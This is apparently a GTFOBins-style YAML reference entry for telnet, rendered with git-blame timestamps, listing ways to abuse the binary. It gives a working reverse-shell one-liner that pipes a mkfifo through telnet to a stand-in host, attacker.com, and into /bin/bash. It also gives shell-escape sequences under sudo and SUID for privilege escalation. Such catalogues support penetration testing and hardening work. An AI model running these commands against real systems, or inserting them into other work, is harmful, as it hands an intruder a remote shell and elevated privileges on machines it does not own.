2018-05-21 21:14:41 +02:00
|
|
|
---
|
|
|
|
|
functions:
|
|
|
|
|
exec-interactive:
|
2018-05-24 21:59:21 +02:00
|
|
|
- description: BSD version only. Needs to be connected first.
|
2018-05-22 22:26:17 +02:00
|
|
|
code: |
|
2018-05-24 21:59:21 +02:00
|
|
|
RHOST=attacker.com
|
|
|
|
|
RPORT=12345
|
2018-05-21 21:14:41 +02:00
|
|
|
telnet $RHOST $RPORT
|
|
|
|
|
^]
|
|
|
|
|
!/bin/sh
|
|
|
|
|
reverse-shell:
|
2018-05-24 22:05:07 +02:00
|
|
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
2018-05-22 22:22:20 +02:00
|
|
|
code: |
|
2018-05-24 21:59:21 +02:00
|
|
|
RHOST=attacker.com
|
2018-05-23 09:08:13 +02:00
|
|
|
RPORT=12345
|
2018-05-21 21:14:41 +02:00
|
|
|
TF=$(mktemp)
|
|
|
|
|
rm $TF
|
|
|
|
|
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/bash 1>$TF
|
|
|
|
|
sudo-enabled:
|
2018-05-24 21:59:21 +02:00
|
|
|
- description: BSD version only. Needs to be connected first.
|
2018-05-22 22:26:17 +02:00
|
|
|
code: |
|
2018-05-24 21:59:21 +02:00
|
|
|
RHOST=attacker.com
|
|
|
|
|
RPORT=12345
|
2018-05-21 21:14:41 +02:00
|
|
|
sudo telnet $RHOST $RPORT
|
|
|
|
|
^]
|
|
|
|
|
!/bin/sh
|
|
|
|
|
suid-limited:
|
2018-05-24 21:59:21 +02:00
|
|
|
- description: BSD version only. Needs to be connected first.
|
2018-05-22 22:26:17 +02:00
|
|
|
code: |
|
2018-05-24 21:59:21 +02:00
|
|
|
RHOST=attacker.com
|
|
|
|
|
RPORT=12345
|
2018-05-21 21:14:41 +02:00
|
|
|
./telnet $RHOST $RPORT
|
|
|
|
|
^]
|
|
|
|
|
!/bin/sh
|
2018-05-22 22:26:17 +02:00
|
|
|
|
2018-05-21 21:14:41 +02:00
|
|
|
---
|
